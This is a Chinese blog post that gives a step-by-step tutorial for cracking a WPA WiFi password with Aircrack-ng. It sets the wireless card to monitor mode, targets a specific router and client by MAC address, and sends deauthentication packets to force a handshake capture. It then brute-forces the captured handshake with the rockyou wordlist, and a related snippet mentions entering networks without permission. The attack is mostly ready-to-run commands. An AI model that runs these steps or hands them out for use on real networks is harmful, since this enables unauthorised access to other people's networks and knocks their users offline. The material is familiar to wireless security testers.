Aircrack-ng破解无线WIFI密码

首先,如果kali是装在虚拟机里面的话,是不能用物理机的无线网卡的。所以,如果我们要想进行无线破解,需要外接一个无线网卡设备,并且该设备要支持 monitor 监听模式

iwconfig :系统配置无线网络设备或显示无线网络设备信息的命令。iwconfig命令类似于ifconfig命令,但是他配置对象是无线网卡,它对网络设备进行无线操作,如设置无线通信频段

  • auto: 自动模式
  • essid:设置ESSID
  • nwid:设置网络ID
  • freq: 设置无线网络通信频段
  • chanel: 设置无线网络通信频段
  • sens: 设置无线网络设备的感知阀值
  • mode: 设置无线网络设备的通信设备
  • ap: 强迫无线网卡向给定地址的接入点注册
  • nick<名字>: 为网卡设定别名
  • rate<速率>: 设定无线网卡的速率
  • rts<阀值>: 在传输数据包之前增加一次握手,确信信道在正常的
  • power: 无线网卡的功率设置

破解无线wifi可以分为以下几步:

  • 查看网卡名字:iwconfig
  • 设置网卡为监听模式:airmon-ng  start wlan0
  • 扫描附近的WIFI:airodump-ng  wlan0mon
  • 选定一个路由器,并监听其流量:airodump-ng -w tplink -c 11 --bssid BC:46:99:3D:66:D6 wlan0mon
  • 选定连接的一个客户端,进行攻击:aireplay-ng -0 50 -a BC:46:99:3D:66:D6 -c A0:AF:BD:D8:E6:31  wlan0mon
  • 对抓取到的cap包进行暴力破解:aircrack-ng  -w  password.txt  -b BC:46:99:3D:66:D6 tplink-01.cap 

查看无线网卡名字:iwconfig   或者  ifconfig  -a   都可以

开启网卡监听模式:airmon-ng  start wlan0   。网卡开启了监听模式之后网卡的名字就变为 wlan0mon  了,以后的所有命令中的网卡名都是叫 wlan0mon

扫描附近的WIFI:airodump-ng  wlan0mon ,会显示附近所有的WIFI信号。

  • BSSID代表路由器的 MAC 地址
  • PWR 代表信号的强度,数值越大代表信息越强
  • CH 代表信道
  • ENC代表用的加密的方式
  • AUTH 代表认证的方式
  • ESSID是WIFI的名字

我们需要选定一个准备破解的WIFI,我们选 tplink-5

监听该路由器的流量:

airodump-ng -w tplink -c 11 --bssid BC:46:99:3D:66:D6 wlan0mon   # -w 参数指定生成的文件名  -c 指定信道 --bssid指定路由器的MAC地址 

下面的 STATION 是连接该WIFI的客户端,下面这里只有一个客户端连接了该WIFI。如果有多个客户端连接的话,我们最好选择活跃点的客户端。

重新打开一个命令行窗口,开始攻击!之前的窗口继续保留,用于观察是否抓包成功

aireplay-ng -0 50 -a BC:46:99:3D:66:D6 -c A0:AF:BD:D8:E6:31  wlan0mon  # 50是发包的数量 -a指定路由器的MAC地址  -c指定连接的客户端的MAC地址 

该命令会打断连接客户端和WIFI之间的连接,等到客户端重新连接WIFI的时候,就会抓取他们之间的握手认证包! 

如果看到下面红色圈住的这些,就说明握手包抓取成功了

我们可以看到会生成四个文件,其中我们有用的文件是以 cap 后缀结尾的文件

对抓取到的cap包进行破解,这需要我们准备好破解的密码字典。所以,无论是任何破解,都需要一个强大的密码字典!

kali下自带有一份无线密码字典——> /usr/share/wordlists/rockyou.txt.gz ,我们将其解压

aircrack-ng  -w  /usr/share/wordlists/rockyou.txt  -b  BC:46:99:3D:66:D6 tplink-01.cap #-w指定 密码字典 -b指定路由器的MAC地址

可以看到,破解成功!该WIFI的密码为 www.123.com 

从最后可以看出,要想破解出WIFI的密码,还是得需要一个很强大的字典!

  • 40
    点赞
  • 322
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 17
    评论
Aircrack是一套用于破解WEP和WPA的工具套装,一般用于无线网络的密钥破解,从而非法进入未经许可的无线网络。只要一旦收集到足够的加密数据包,利用它就可以破解40到512位的WEP密匙,也可以通过高级加密方法或暴力破解破解WPA1或2网络。Aircrack-ng是由6个不同部分组成的套件:   1.aircrack-ng   用于破解WEP以及WPA-PSK密钥。一旦aircrack-ng工具收集了足够的信息,aircrack-ng将会分析这些数据,并试图确定使用中的密钥。   2.airdecap-ng 解读被破解的网络数据包   3.airmon-ng 为使用整个aircrack-ng套件配置一个网卡   4.aireplay-ng 在无线网络中产生可能在恢复中的WEP密钥所需的流量   5.airodump-ng 捕获被aircrack-ng用于破解WEP密钥的802.11帧   6.tools 为微调提供分类工具箱   安装与运行aircrack-ng   在Windows上运行它非常容易,只要在系统上安装合适的驱动即可,可以在aircrack-ng网站上找到这些驱动。   安装完后就可以开始恢复WEP密钥这一部分。首先要收集足够的数据包来破解密钥。为了做到这一点运行airodump-ng这一套件,在其进行无线发送时捕获流量;作为选择,可以为airodump提供一个已存在的数据包捕获文件,也称为PCAP。   如果不指定任何参数运行airodump将显示一个快速帮助界面:   $ sudo airodump   Password:*************   Airodump 2.3 2004,2005 Christophe Devine   Usage:airodump   [IVs flag]   将channel号码指定为0,在b/g通道之间跳变;如果该数据包源是PCAP文件,那么将忽略该通道。如果可选的IVs标志位设置为1,那么,唯一被捕获的独特WEP IVs将保存于存储空间中;这种默认的行为就是以lippacp格式编写的整个数据包。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 17
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢公子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值